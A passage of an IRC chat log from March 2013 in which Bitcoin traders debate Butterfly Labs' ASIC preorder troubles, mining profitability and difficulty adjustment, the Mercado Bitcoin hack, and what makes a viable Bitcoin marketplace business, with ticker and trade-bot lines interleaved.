mircea_popescu: they do not currently have anywhere near the number of chips required to fulfill all preorders Mar 29 17:25:37 each box can only supply 120W Mar 29 17:25:38 mircea_popescu: they are still making more Mar 29 17:25:44 hm Mar 29 17:25:50 with what money are they making more ? Mar 29 17:25:52 mircea_popescu: this just means they will fulfill fewer than we thought Mar 29 17:25:56 even though i now have bought a bfl 60 ghs i think this mess is lulz Mar 29 17:26:01 mircea_popescu: errr, with the fucktons and fucktons of preorder money? Mar 29 17:26:05 ... Mar 29 17:26:17 either i'm the only one with a calculator on my os or else wtf is going on here. Mar 29 17:26:26 ponzi Mar 29 17:26:30 mircea_popescu People sent them (and are still sending them) bajillions of bitcoins. If they kept any that's where the money comes from. Mar 29 17:26:42 mircea_popescu: I don't know what you're calculating from Mar 29 17:26:50 getting one of the first shipped, even at 40 ghs will still be hella good Mar 29 17:26:52 OneMiner my intel says people sent them a lot of btc back when, and that people have not been sending more Mar 29 17:26:54 mircea_popescu: unless you have inside knowledge about BFL's costs that you should share with the rest of us Mar 29 17:26:58 and moreover that people have on the net been cancelling Mar 29 17:27:18 but that's irrelevant. Mar 29 17:27:29 ;;ticker Mar 29 17:27:29 BTCUSD ticker | Best bid: 88.70001, Best ask: 88.97000, Bid-ask spread: 0.26999, Last trade: 88.99000, 24 hour volume: 156606.63389529, 24 hour low: 75.00111, 24 hour high: 94.75000, 24 hour vwap: 86.60949 Mar 29 17:27:41 from whatever i can foggily remember about managing ops, if you start a project to do X and you do X/2 Mar 29 17:27:45 you can't just make another X Mar 29 17:27:53 mircea_popescu Hence their scramble I guess. But they made the chips one way or the other so the large initial expense is done with. It will likely cost them less to produce a revised board. Mar 29 17:27:56 they did with fpga Mar 29 17:28:19 OneMiner ok, it will cost less. this i agree Mar 29 17:28:23 but it will cost SOMETHING Mar 29 17:28:29 I agree. Mar 29 17:28:38 mircea_popescu: ok, show us your math that says they already spent all the money, then Mar 29 17:28:38 you can't just go "we're doing X item with Y resources" Mar 29 17:28:45 then later "well now we're doing 2X really" Mar 29 17:29:19 gwillen more importantly than the money, they will have to get people to pre-order 2nd batch units Mar 29 17:29:25 to use that money to complete 1st batch. Mar 29 17:29:34 much like everyone else i guess, but anyway, still pretty fucking fraudulent. Mar 29 17:29:41 bfl is so shady, its lol Mar 29 17:30:01 [HAVELOCK] [HIM] 4 @ 1.81 = 7.24 BTC [-] Mar 29 17:30:05 i mean this is literally what a ponzi is ; Mar 29 17:30:20 get people to put up equity (which you call pre-orders) to deliver benefits to ppl who put up equity earlier Mar 29 17:30:22 mircea_popescu: as far as I know they are not dividing anything into batches, they are just taking preorders continuously Mar 29 17:30:56 gwillen this isn't about bfl fantasy-labeling of real world items Mar 29 17:30:59 this is about the underlying reality. Mar 29 17:31:07 there's no flux-process chip making Mar 29 17:31:10 chips are made in batches. Mar 29 17:31:35 well, they were talking about an order of like 6 wafers Mar 29 17:31:43 which is nowhere near enough for all the preorders that existed even at the time they said it Mar 29 17:31:46 so clearly there are going to be more Mar 29 17:31:50 fuck if I know how many more they ordered Mar 29 17:31:59 moreover, fo the 6 they burned one, so 5. Mar 29 17:32:01 [HAVELOCK] [HIM] 3 @ 1.8 = 5.4 BTC [-] Mar 29 17:32:02 [HAVELOCK] [HIM] 4 @ 1.8 = 7.2 BTC [-] Mar 29 17:32:13 and of the 5 they're not really getting 100%, and the chips dont work to spec. Mar 29 17:32:16 so... 3 ? Mar 29 17:32:31 BFL is totally fucked Mar 29 17:32:39 bottom line Mar 29 17:32:50 their business model is broken Mar 29 17:32:53 i can't see a future where they dig themselves out of the hole. Mar 29 17:33:03 they tried to assemble the plane from parts after they jumped off the cliff Mar 29 17:33:13 and the ground is coming up fast Mar 29 17:33:14 bugpowderr ya but it was a plastic model and they had no glue. Mar 29 17:33:21 and the parts dont work Mar 29 17:33:22 yeah Mar 29 17:33:30 they are totally fucked Mar 29 17:33:44 somebody brought me whole hazelnuts Mar 29 17:33:50 i have been using various items on my desk to crack them Mar 29 17:33:52 bugpowderr: what is your next bet? Mar 29 17:34:01 people keep wandering in concerned to see wtf am i thrashing into the ground Mar 29 17:34:05 I am just going to sit tight for a while Mar 29 17:34:22 [BTCTC] [B.YABMC] 1 @ 0.00701 BTC [-] Mar 29 17:34:24 Let those coins season till the next great opportunity comes Mar 29 17:34:34 shorting BFL would be wonderful though Mar 29 17:34:43 bugpowderr they're aptly not listed Mar 29 17:34:44 The truth of the matter is they ether didn't know what they were talking about or were lying about their time table and now it turns out that the same goes for their chip and board production. They are EITHER (choose one) lying or incompetent. Mar 29 17:34:57 yep Mar 29 17:35:04 OneMiner im totally seeing a replay of tom's basic here tbh. Mar 29 17:35:12 Maybe a bit of both..... Mar 29 17:35:36 Tom's basic? Is Tom the guy that was doing bASIC? Mar 29 17:35:40 thank god their are other semi-competent manufacturers. I think bitcoin won't actually be much affected by it Mar 29 17:35:42 yes. Mar 29 17:36:00 bugpowderr i dunno about that. the only ppl to demonstrate asic hashing are both chinese Mar 29 17:36:03 I see. Ok, I can agree with that then. It's lol if it wasn't so destructive. Mar 29 17:36:24 the only people to demonstrate fuckuppery of incredible level are both american Mar 29 17:36:28 this pattern is starting to worry. Mar 29 17:36:34 dumb question, but with the recent explosion in the network hash rate doesn't being forced to wait for bfl's product make it less valuable by the time you actually recieve it? Or does the rise of USD/BTC from the time of preorder to delivery make up for that? or is it a wash? Mar 29 17:36:39 o, and all europe has contributed to date is scams Mar 29 17:36:43 there is a reason APPLE is assembled in china Mar 29 17:36:47 (the german folks recently, the primeasic earlier etc) Mar 29 17:36:58 pgp it does make it less valuable yes Mar 29 17:37:24 exchange rate could rise in the future Mar 29 17:37:24 pgp You're on the right track but it's up to you to decide. Mar 29 17:37:37 you will never make up for the missing coins from the lost opportunity Mar 29 17:37:49 are the allowing people to cancel and are they returning BTC? Mar 29 17:38:03 pgp btc equiv of the fiat value of the btc sent at the time it was sent Mar 29 17:38:09 90% haircut. Mar 29 17:38:22 lol Mar 29 17:39:11 [BTCTC] [ASICMINER-PT] 6 @ 0.8 = 4.8 BTC [+] Mar 29 17:39:22 in fairness there's plenty of good reason for that, as in, they're supposedly paying ppl in fiat. Mar 29 17:39:27 but anyway, a bad deal. Mar 29 17:40:08 pgp: if you bought with dollars you weren't otherwise going to use to buy BTC, I think you get pretty much a wash Mar 29 17:40:23 pgp: if you bought with BTC or with dollars you would have put into BTC, I think you lose Mar 29 17:40:40 because the increase in price does not correspond to an increase in USD output, because there's a corresponding increase in difficulty. Mar 29 17:41:09 bugpowderr: do you still think MPOEbot is at a loss? Mar 29 17:41:15 yes Mar 29 17:41:33 I don't think the puts I bought yesterday are going to make up the difference :) Mar 29 17:41:40 any decent resources on the web that discusses GH/s NPV (net present value) and associated variables? Mar 29 17:41:42 but I don't know Mar 29 17:41:46 we will find out tonight! Mar 29 17:41:51 nice bounce in the price already though Mar 29 17:41:55 (S.MPOE) Mar 29 17:41:55 Anybody selling a small amount of ASICMINER? Mar 29 17:42:05 i am so excited!!!!! Mar 29 17:42:09 pgp not really. Mar 29 17:42:10 by general rule is buy S.MPOE whenever it touches .0006 Mar 29 17:42:14 my Mar 29 17:42:16 pgp: I'd be interested in seeing such an analysis if you found or made one Mar 29 17:42:29 im a goat, and im on a motherfucking boat! Mar 29 17:42:35 yah what gwillen said. i gather you're competent enough, go make one pgp Mar 29 17:42:43 we'll tear it apart and laugh at you, but Mar 29 17:42:47 it'll be invaluable for your education. Mar 29 17:42:54 I think there is a website blog that does a pretty in depth analysis of the various miners Mar 29 17:43:00 and projected profit Mar 29 17:43:04 bugpowderr i remember one that sucked ass. Mar 29 17:43:11 its on reddit every once in a while Mar 29 17:43:13 lots of plots Mar 29 17:43:14 buncha broken graphs Mar 29 17:43:15 yeah Mar 29 17:43:17 o yeah. that. Mar 29 17:43:18 too many plots Mar 29 17:43:33 I never really read it carefully Mar 29 17:43:38 anyway, the guy made retarded, miner-biased assumptions Mar 29 17:43:43 yeah Mar 29 17:43:52 curse of the assumptions Mar 29 17:43:58 people gotta learn somehow that lipsticked pig is not useful Mar 29 17:44:06 too many knobs, lets pick a value we like Mar 29 17:44:12 exactly Mar 29 17:44:29 this should be taught in hs. "too many knobs ? always pick a value you can't stand" Mar 29 17:45:28 [MPEX] [S.DICE] 2440 @ 0.00419995 = 10.2479 BTC [+] Mar 29 17:45:49 i think all the BFL theorizing is based on old numbers. People were saying in BFL shoutbox last night that there are many more than 6 wafers Mar 29 17:45:56 also Mar 29 17:46:10 BFL is claiming they will fix the issue as they start shoipping Mar 29 17:46:23 so their loss in havbing to send more units to meet obligations, Mar 29 17:46:35 may be minimal Mar 29 17:46:40 if they actually fix the problem Mar 29 17:46:55 they claim the problem is not with the chips themselves Mar 29 17:47:00 but eslewhere in the design Mar 29 17:47:18 this is all, of course, impossible to prove Mar 29 17:47:40 yea Mar 29 17:47:57 meanwhile Mar 29 17:48:01 brazil exchange hacked. Mar 29 17:48:03 looks grim Mar 29 17:48:21 http://pastebin.com/PZfuZM3X Mar 29 17:48:26 what do you think the price of the first 60 ghs to ship would be? if sold on the market? Mar 29 17:48:51 lol mp i cant read that Mar 29 17:49:02 i did not even know they had an exchange Mar 29 17:49:27 It's possible they have finalized a small amount of their boards on order. So changes to future boards would be of minimal cost. Like higher quality VRMs or something. Mar 29 17:49:32 O Mercado Bitcoin sofreu um ataque, que infelizmente foi bem sucedido, em sua implementação de redeem code. Devido à um erro de codificação, foi possível ao atacante gerar novos códigos de crédito, sem que o valor fosse devidamente debitado em seu saldo final. Conseguindo assim, gerar um montante falso de bitcoins dentro do sistema e resgatá-lo em tempo hábil, durante a madrugada. Mar 29 17:49:43 that says their redeem codes were broken and leaked equity. Mar 29 17:49:56 hmm Mar 29 17:50:04 they should have known better than to use codes... Mar 29 17:50:08 basic factors would include cost per GH/s for hardware, current network hash rate,growth assumptions in overall network hash rate, cost of electricity, lag time from laying out cash per GH/s and actually getting it working product. And some sort of time value of money discount factor for future cash flows. Am I missing anything? Mar 29 17:50:46 anyone want to buy the first bfl asic everordered? Mar 29 17:51:03 asking 150 btc Mar 29 17:51:44 [BTCTC] [BTC-BOND] 10 @ 0.009994 = 0.0999 BTC [-] Mar 29 17:52:43 [BTCTC] [BTC-BOND] 4 @ 0.009994 = 0.04 BTC [-] Mar 29 17:53:19 I wonder how Teramining is coming along Mar 29 17:53:33 what is that? Mar 29 17:56:04 crazy news huh Mar 29 17:56:51 http://trilema.com/2013/and-another-one-bites-the-dust-mercado-bitcoin/ Mar 29 17:57:02 what news? Mar 29 17:57:38 oh, never even heard of them Mar 29 17:58:58 pgp: also...current btc/usd exchange rate and expected btc/usd exchange rate Mar 29 17:59:40 i feel like that is what most miners forget about Mar 29 17:59:48 in their break even calculations Mar 29 18:00:01 ;;ticker Mar 29 18:00:02 BTCUSD ticker | Best bid: 88.00000, Best ask: 88.29000, Bid-ask spread: 0.29000, Last trade: 88.29000, 24 hour volume: 156455.07758322, 24 hour low: 75.00111, 24 hour high: 94.50000, 24 hour vwap: 86.54041 Mar 29 18:00:07 if you are going to mine, you should be bullish on bitcoins i think Mar 29 18:00:27 ;;bc,24hprc Mar 29 18:00:28 86.68 Mar 29 18:00:41 MJR_III or hedge Mar 29 18:00:53 ;;calc (86.68-41)/86.68 Mar 29 18:00:53 0.526995846793 Mar 29 18:01:01 mircea_popescu: yeah...or hedge Mar 29 18:01:13 I think you start first with a constant BTC USD model... Mar 29 18:01:26 but if i am calculating my break even using todays prices as most mining calculators do... Mar 29 18:01:59 then it doesn't appear to be worth it, but if i expected it to hit 100...that could make it profitable Mar 29 18:02:45 calculating mining profits anything more than 1 week out is voodoo anyway Mar 29 18:02:50 yeah Mar 29 18:02:54 MJR_III If you are that close to the line then you should probably just buy coins with your hardware and power costs. You'll end up with much more. Mar 29 18:03:10 but i think most people worry about future difficulty all the time Mar 29 18:03:35 but don't think of the other side of the coin...which is mining fewer coins is fine if they are each worth more Mar 29 18:03:45 http://images.search.yahoo.com/images/view;_ylt=A2KJkCGyuVVRDiwAfjKJzbkF;_ylu=X3oDMTBlMTQ4cGxyBHNlYwNzcgRzbGsDaW1n?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dlotus%2Bcar%26fr%3Dsfp%26fr2%3Dpiv-web%26tab%3Dorganic%26ri%3D109&w=1600&h=1200&imgurl=www.autocarsight.com%2Fwp-content%2Fuploads%2F2011%2F10%2F2012-Lotus-Exige-S.jpg&rurl=http%3A%2F%2Fwww.autocarsight.com%2Ftag%2Flotus-exige-s&size=320.2+KB&name=2012+Lotus+Exige+S+Spec Mar 29 18:03:46 s+and+Review&p=lotus+car&oid=0cb0ab46c07e25b28f10b5ae7f1d4ff1&fr2=piv-web&fr=sfp&tt=2012%2BLotus%2BExige%2BS%2BSpecs%2Band%2BReview&b=91&ni=114&no=109&ts=&tab=organic&sigr=11dgs3a7r&sigb=12uq2h7eh&sigi=126g0sakn&.crumb=S4mQTrSc6lC Mar 29 18:03:52 CPU mining might be profitable if you have a long enough timeline Mar 29 18:03:55 and are very bullish Mar 29 18:04:16 that link! anyway, should i get it?> lotus exige s? Mar 29 18:04:16 obviously it is somewhat speculative Mar 29 18:04:58 lol Chaang-Noi, obviously. :P Mar 29 18:05:29 wife says no Mar 29 18:05:35 but im not sure im going to listen Mar 29 18:05:39 it will just show up one day... Mar 29 18:05:52 claim i dont know how it got there... Mar 29 18:06:26 hahaha Mar 29 18:06:38 :) Mar 29 18:07:10 get a go kart Mar 29 18:07:14 How about an old civic or something, tub it out and take it to the track. Then you just need a tow vehicle. <----- that's my vision except with a miata. Mar 29 18:08:09 taxes in thailand on cars liek this are no joke like 500% to 700% or more... Mar 29 18:08:10 its about as pratical as an exige Mar 29 18:08:22 luxury tax? Mar 29 18:08:37 i sadly cant get one here, ill have to leave it in the usa Mar 29 18:08:54 they taxes these cars like crazy, yeah luxury tax Mar 29 18:09:05 more or less fair as there are no other real taxes Mar 29 18:09:22 honestly i think i would just move first Mar 29 18:10:45 [MPEX] [S.MPOE] 29000 @ 0.00068158 = 19.7658 BTC [+] Mar 29 18:11:17 Yes, in that case move first. Less complicated. Mar 29 18:12:34 yeah :/ unless btc goes to 5,000 then im getting 4... Mar 29 18:13:04 bugpowderr: do you still think MPOEbot is at a loss? Mar 29 18:13:10 how did that happen Mar 29 18:13:13 oops sorry Mar 29 18:13:17 disregard Mar 29 18:13:31 :) i still think its a loss:) Mar 29 18:13:38 just a guess Mar 29 18:13:57 the price was manipulated yesterday... Mar 29 18:14:05 the bot sucked up a lot of calls Mar 29 18:14:16 ;;ticker Mar 29 18:14:17 BTCUSD ticker | Best bid: 88.23100, Best ask: 89.00000, Bid-ask spread: 0.76900, Last trade: 89.00000, 24 hour volume: 156779.61814498, 24 hour low: 75.00111, 24 hour high: 94.50000, 24 hour vwap: 86.53906 Mar 29 18:14:21 :) Mar 29 18:14:35 convient time to "dump" for some Mar 29 18:15:13 mhm btc 100 by april 1st Mar 29 18:15:17 yay or nay Mar 29 18:15:41 lol 4 loti hahaha Mar 29 18:16:08 if btc = 5k i will do it! Mar 29 18:17:05 5k would put me in a sweet spot. I couldn't complain about that. Mar 29 18:17:55 That's a reset button. School and a living standard bump. Mar 29 18:18:27 yeah btc at 5k i could do 4 loti in thailand with no problem Mar 29 18:19:56 all this i'm so rich talk is bad juju Mar 29 18:20:13 lol, its the top of a bubbler Mar 29 18:20:22 josh bft is trying to beat the bitbet date Mar 29 18:20:23 people are getting rich ThickAsThieves are you not Mar 29 18:20:24 we wont hit 5k until we correct Mar 29 18:20:27 ?* Mar 29 18:20:39 btc went from 2 to 90 in like a year, or like x45 Mar 29 18:20:51 90 x 45 is like 4k so like one yearish right? Mar 29 18:20:51 i did my bragging last night Mar 29 18:20:52 :) Mar 29 18:21:00 but i'm still not satisfied Mar 29 18:21:03 ADD GOOD JUJU to the mix Mar 29 18:21:04 Ya, the price increase is crazy. Mar 29 18:21:06 invest invest invest Mar 29 18:21:17 drive the boom, don't be like a dotcom boom Mar 29 18:21:18 just wait until normal people invest in btc Mar 29 18:21:21 [BTCTC] [BASIC-MINING] 1 @ 0.37 BTC [+] Mar 29 18:21:46 You know what's crazy good news? I think the US money laundering news is great. It's step one to establishing bitcoin in US society. Mar 29 18:21:49 I think as old money enters the btc economy, due to lack of regulation people like mircea_popescu will take their money pretty quickly Mar 29 18:22:25 people inside trade hardcore here... Mar 29 18:22:40 [BTCTC] [ASICMINER-PT] 110 @ 0.775 = 85.25 BTC [-] Mar 29 18:22:51 well gents, tomorrow i gotz to travel so im off to bed, call me if we get close to 100 Mar 29 18:23:04 holy shit 110 lol Mar 29 18:23:14 [BTCTC] [ASICMINER-PT] 3 @ 0.77001 = 2.31 BTC [-] Mar 29 18:23:43 [BTCTC] [ASICMINER-PT] 29 @ 0.77 = 22.33 BTC [-] Mar 29 18:24:47 [MPEX] [S.MPOE] 8941 @ 0.00068158 = 6.094 BTC [+] Mar 29 18:24:51 [BTCTC] [ASICMINER-PT] 5 @ 0.76 = 3.8 BTC [-] Mar 29 18:25:08 [BTCTC] [ASICMINER-PT] 10 @ 0.75801 = 7.5801 BTC [-] Mar 29 18:25:26 ;;ticker Mar 29 18:25:27 BTCUSD ticker | Best bid: 89.48500, Best ask: 89.50000, Bid-ask spread: 0.01500, Last trade: 89.50000, 24 hour volume: 156731.60658333, 24 hour low: 75.00111, 24 hour high: 94.50000, 24 hour vwap: 86.52536 Mar 29 18:26:18 not mainstream, but started downloading Cliff's halfpasthuman.com wujo on bitcoin | http://halfpasthuman.com/wujo/clifswujo3252013bitcoin.mp3 Mar 29 18:27:06 Who dis? Mar 29 18:32:18 [BTCTC] [ASICMINER-PT] 6 @ 0.758 = 4.548 BTC [-] Mar 29 18:32:23 [BTCTC] [ASICMINER-PT] 4 @ 0.757 = 3.028 BTC [-] Mar 29 18:32:32 [BTCTC] [ASICMINER-PT] 1 @ 0.75613 BTC [-] Mar 29 18:32:37 [BTCTC] [ASICMINER-PT] 1 @ 0.75612 BTC [-] Mar 29 18:32:44 [BTCTC] [ASICMINER-PT] 6 @ 0.75201 = 4.5121 BTC [-] Mar 29 18:32:47 [BTCTC] [ASICMINER-PT] 10 @ 0.752 = 7.52 BTC [-] Mar 29 18:32:59 [BTCTC] [ASICMINER-PT] 1 @ 0.75101 BTC [-] Mar 29 18:32:59 [BTCTC] [ASICMINER-PT] 8 @ 0.751 = 6.008 BTC [-] Mar 29 18:32:59 [BTCTC] [ASICMINER-PT] 62 @ 0.75 = 46.5 BTC [-] Mar 29 18:33:00 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Mar 29 18:33:32 $unconfirmed Mar 29 18:33:35 [MPEX] [S.MPOE] 7991 @ 0.00068158 = 5.4465 BTC [+] Mar 29 18:33:36 smickles: 747 Mar 29 18:33:40 known for his asymetric language trend analysis, using the change of language in the postings online to derive forecasts for developing trends Mar 29 18:38:04 khan academy had a great video on diffie hellman system Mar 29 18:38:47 Save 90 % if paying with real currency such as Bitcoin :) Mar 29 18:49:04 is there international demand for getting a US high school diploma with online classes? Mar 29 18:49:23 anf furthermore would bitcoin be a good fit for such a service? Mar 29 18:51:10 might be hard to understand btc w/out a high school diploma Mar 29 18:51:24 well Mar 29 18:51:34 thats not the only angle Mar 29 18:51:44 person can be an adult Mar 29 18:51:53 with or without a local diploma Mar 29 18:52:11 tahts why i ask if there is demand for a "US" diploma Mar 29 18:52:18 question about network difficulty... does it adjust to bring rate back to 1 block per 10 min on current hash rate, or does it try to compensate to bring overall hash rate from last halving day to 1 block evey 10 min? Mar 29 18:53:19 ThickAsThieves: I didn't catch that. So they might have a diploma from Spain, but want a US one. Mar 29 18:53:24 US diploma would be accredited and accepted by colleges Mar 29 18:53:32 right Mar 29 18:54:04 credit recovery might even be possible as well Mar 29 18:54:08 but that would get tricky Mar 29 18:54:09 smickles: will send you pm in a second Mar 29 18:54:38 Goat from a phone. Lol at technology. Mar 29 18:56:00 pgp 1 block per 10 min based on rate of block generation during the period. Mar 29 18:57:39 erik answers https://bitcointalk.org/index.php?topic=101902.msg1700294#msg1700294 Mar 29 18:58:04 so, if we assume a constant increase in hash rate, then halving day, by definition will alway be something short of 4 years... Mar 29 18:58:51 pgp Yes, if hashrate always goes up then halving day will come sooner by a bit. Mar 29 18:59:11 The oposite is also true. Mar 29 18:59:32 and difficulty adjusts every 2100 blocks, correct? Mar 29 19:00:45 Hmmm... 2018 or something like that. Mar 29 19:00:58 thestringpuller say what ? Mar 29 19:01:17 No, the longest the diff will not adjust is two weeks Mar 29 19:02:02 slowdown in hash rate, it will lower in two weeks- not 2.5 or 3 weeks Mar 29 19:02:28 It's not based on time. It's based on number of blocks. You sure about that jborkl? Mar 29 19:02:51 I have been through quite a few lower diff levels and it adjusts at two weeks Mar 29 19:02:59 https://en.bitcoin.it/wiki/Difficulty#How_often_does_the_difficulty_change.3F Mar 29 19:03:35 ThickAsThieves: Credit Repair business is actually a good business to get into in the US. since they legislated against all those "instant credit repair" scams, people can actually get help. Mar 29 19:04:28 If the previous 2016 blocks took more than two weeks to find, the difficulty is reduced Mar 29 19:04:31 nic erik post Mar 29 19:04:51 https://en.bitcoin.it/wiki/Difficulty Mar 29 19:05:51 jborkl I think you're reading that wrong. Mar 29 19:06:22 If the previous 2016 blocks took more than two weeks to find <---- suggests that you'd need all 2016 blocks to be found. Mar 29 19:07:23 if half the network took a shit, then we would drop to one block every 20 minutes and that would last a month Mar 29 19:07:31 killing the network in the meantime Mar 29 19:08:28 jborkl Correct. Mar 29 19:08:41 it adjusts every two weeks maximum Mar 29 19:08:54 can be shorter of course Mar 29 19:09:12 Umm.... I don't think so dood. Site it or it didn't happen. Mar 29 19:09:25 nice post by Erik Mar 29 19:14:17 bugpowderr ya i thought so. Mar 29 19:14:21 [MPEX] [S.MPOE] 8000 @ 0.00067944 = 5.4355 BTC [-] Mar 29 19:14:25 im starting to like the guy tbh. Mar 29 19:14:34 ;;calc 14*24*6 Mar 29 19:14:35 2016 Mar 29 19:14:42 it compares that to Mar 29 19:15:07 ;;14*24*60 Mar 29 19:15:08 Error: "14*24*60" is not a valid command. Mar 29 19:15:15 ;;calc 14*24*60 Mar 29 19:15:15 20160 Mar 29 19:15:53 it readjusts after 2016 blocks Mar 29 19:16:09 however long that takes Mar 29 19:17:12 thats why a huge increase in mining power will not really help you mine a ton of blocks Mar 29 19:17:24 you will just increase the difficulty quicker Mar 29 19:21:13 The change in difficulty is in proportion to the amount of time over or under two weeks the previous 2016 blocks took to find. Mar 29 19:25:16 Is anyone using www.bitmit.net ? Is it the eBay of bitcoin or just one of many contenders? Mar 29 19:25:30 And is it, or are any of them, listed assets? Or soon to be? Mar 29 19:26:41 [BTCTC] [CRYPTO-TRADE] 36 @ 0.2 = 7.2 BTC [+] Mar 29 19:27:11 I think someone mentioned building an eBay-killer here this week but now I can't remember who/when/what Mar 29 19:27:20 It's been quite the week. Mar 29 19:27:32 unbalanced probably me. Mar 29 19:28:34 Ah... so does bitmit not cut it or you just hadn't seen it or still plenty of room for competition I guess? Mar 29 19:29:32 Note to self: one question at a time. Mar 29 19:29:33 Oh jeeze... http://market-ticker.org/akcs-www?get_gallerynr=4089 Mar 29 19:29:51 don't trust da gubberment Mar 29 19:31:23 unbalanced basically it's yet another rehash of the old and by now stale "i wrote a script therefore this is a business". Mar 29 19:31:24 unbalanced: mircea dreams about it Mar 29 19:31:26 A lot can change in a month I guess. And people say bitcoin is volatile. Mar 29 19:31:52 (re: Cyprus) Mar 29 19:32:52 imagine if some kid made a html page which read THE REAL AMZON Mar 29 19:33:03 would that be an amazon killer ? Mar 29 19:33:20 mircea_popescu: I've read your "recognize you're an idiot, noob" posts re: BTC businesses and 100% agree. Mar 29 19:33:38 to kill ebay you need a lot of ops competence. Mar 29 19:33:55 As a guy wondering what my place is in the BTC economy, I take that stuff to heart and try to remember it. Mar 29 19:34:00 this "here's a script that sorta replicates functionality now we wait for "the users" to make us a business" is nonsense Mar 29 19:34:27 that aside : bitcoin desperately needs an ebay killer ap. Mar 29 19:34:44 the only way to obtain such a thing is if someone with a lot of fmcg experience and contacts actually starts one. Mar 29 19:35:24 So it only sucks because it doesn't have proven profits yet? Once proven to have traction and revenue, it wouldn't meet the noob=sux criteria? Mar 29 19:35:32 not at all. Mar 29 19:35:46 Yeah our posts crossed. I read ya. Mar 29 19:35:50 let's go into detail here to understand each other. Mar 29 19:35:55 Shoot Mar 29 19:35:57 i don't care how much profit the doctor's office makes. Mar 29 19:36:07 i care whether he's a doctor. Mar 29 19:36:41 you can probably make a fuckton selling folk remedies and straight silicone injections into the ass. heck, some people do. Mar 29 19:36:47 this doesn't validate them as doctors. Mar 29 19:36:58 Roger. So Meg Whitman starts an eBay killer using bitcoin, that's when to pay attention. Mar 29 19:37:25 for sure. Mar 29 19:37:29 [MPEX] [S.MPOE] 8000 @ 0.00067446 = 5.3957 BTC [-] Mar 29 19:37:34 [MPEX] [S.MPOE] 16610 @ 0.00068158 = 11.321 BTC [+] Mar 29 19:37:35 but it doesn't have to be supercorp ceo. Mar 29 19:37:35 [MPEX] [S.MPOE] 891 @ 0.00068292 = 0.6085 BTC [+] Mar 29 19:37:55 some guy who was the near east distribution manager for coca cola since 1992 Mar 29 19:38:32 Right... just not an anonymous site like bitmet. Real-world experience, real-world human face, contact info, support, operational chops, execution... Mar 29 19:38:45 a woman that was in charge of maersk pacific ops for the past five years Mar 29 19:39:01 the vp of LMHV Belgium Mar 29 19:39:02 somebody Mar 29 19:39:21 i would say that it is not so much even their experience (though that is helpful) but rather the fact that they are good at doing what they set out to do Mar 29 19:39:30 many executives get fired for sucking Mar 29 19:39:32 and this isn't random dickery as in "you must be old" or some shit. the ops experience shows. Mar 29 19:39:40 there's a lot to business that's not taught in any c++ manual Mar 29 19:39:53 True that. Mar 29 19:39:57 yes, being a good programmer does not make you a good business manager Mar 29 19:40:11 though not mutually exclusive Mar 29 19:40:14 i can usually sniff out a half decent manager from a mile away Mar 29 19:40:20 managers and polecats. Mar 29 19:41:11 i think that one of the problems is that the current marketplace loves fuzzy things like "social networking" and pretty websites Mar 29 19:41:20 but those things do not have the operational challenges of a real business Mar 29 19:41:35 which is why you see things like BFL and others Mar 29 19:41:38 who can't execute Mar 29 19:41:40 yeah. they also don't have the chances of a real business. Mar 29 19:41:42 So... in this case, bitmit.net (they need a better domain at least, I've mistyped it 3 different ways now) apparently has 17029 listings. Mar 29 19:41:44 right Mar 29 19:41:55 unbalanced that metric is meaningless. Mar 29 19:42:13 you have five minutes to find me a way to spend 10 btc on items that i could conceivably use during the remainder of 2013 Mar 29 19:42:20 for a 5% or more discount from amazon. Mar 29 19:42:20 (From their "worldwide" dropdown in upper right.) Mar 29 19:42:21 go. Mar 29 19:42:31 actually executing in the real world when you have more complex operations than basically posting messages to each other is tough Mar 29 19:42:41 and most web startups don't have to work in the REAL world Mar 29 19:43:03 pinterest, twitter, facebook...they don't actually have to produce real things that take supply chains Mar 29 19:43:19 Bear with me, I'm just wondering... is this a viable biz for that script kiddie, or maybe a team of 4, at these levels? Is it a good start or is Mr. Bitmit wasting his time? Mar 29 19:43:30 i don't see that it is a business at all. Mar 29 19:43:38 the test of a business is the value proposition. Mar 29 19:43:45 [BTCTC] [ASICMINER-PT] 1 @ 0.761 BTC [+] Mar 29 19:43:45 state it for my benefit, what is bitmit's vp ? Mar 29 19:43:58 (leaving aside they don't even know this is where it starts) Mar 29 19:43:59 "Shit you can buy with your bitcoins" Mar 29 19:44:05 that's not a vp. Mar 29 19:44:11 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [-] Mar 29 19:44:23 so a company like GE or Boeing have to do a whole different set of things than a web startup in silicon valley, and the fallacy is that because you are good at one thing, you will be good at the other Mar 29 19:44:41 "it costs you less to buy your lube in btc on our site than at your corner lube shop" is a vp. Mar 29 19:44:48 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Mar 29 19:44:51 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [-] Mar 29 19:44:54 "eBay for bitcoins" Mar 29 19:45:01 dude. a vp is always comparative. Mar 29 19:45:05 X < Y is a vp. Mar 29 19:45:22 thx, sorry but real life is interrupting, gotta run Mar 29 19:45:25 sorry Mar 29 19:45:35 "ebay for bitcoins" is a marketing ploy, different beast. Mar 29 19:45:35 Thanks for the schoolin' Mar 29 19:45:37 gl. Mar 29 19:46:58 its an interesting challenge, and i think its a testament to the strength of bitcoin that it survives bad management Mar 29 19:47:32 MJR_III well... it also yet benefits from a very low bar. Mar 29 19:47:38 nobody's seriously using it for anything much yet. Mar 29 19:47:39 because at the end of the day...it comes down to management Mar 29 19:47:47 fiat is regularly used in mission critical situations, Mar 29 19:47:59 true Mar 29 19:47:59 but if that is going to change, you will need people with a different skill set Mar 29 19:48:02 such as the woman with no underwear on but five bucks in her pocket. Mar 29 19:48:08 she knows she can get undies. for sure. Mar 29 19:48:14 good point Mar 29 19:48:34 and you know you can get gas, and food, and boots Mar 29 19:48:38 i think bringing efficiency to the exchange mechanism is going to be the first step Mar 29 19:48:47 possibly. Mar 29 19:49:08 the other biggest thing will be the bitcoin atm Mar 29 19:49:24 but i think that that will rely on an efficient and stable exchange Mar 29 19:49:41 for example...the lady with no undies has a debit card Mar 29 19:49:49 and the store only takes cash Mar 29 19:49:56 not a problem nowadays, you just run to the atm Mar 29 19:50:13 but you cannot have that level of convenience right now with bitcoin Mar 29 19:50:13 cash only places usually have an atm on site Mar 29 19:50:20 smickles: yes exactly Mar 29 19:50:46 i think to drive local adoption, you will need to have two-way bitcoin atms spread locally Mar 29 19:51:00 your fees would be in the spread that you are charging Mar 29 19:51:21 since the transactions can go both ways, you could put cash in and get 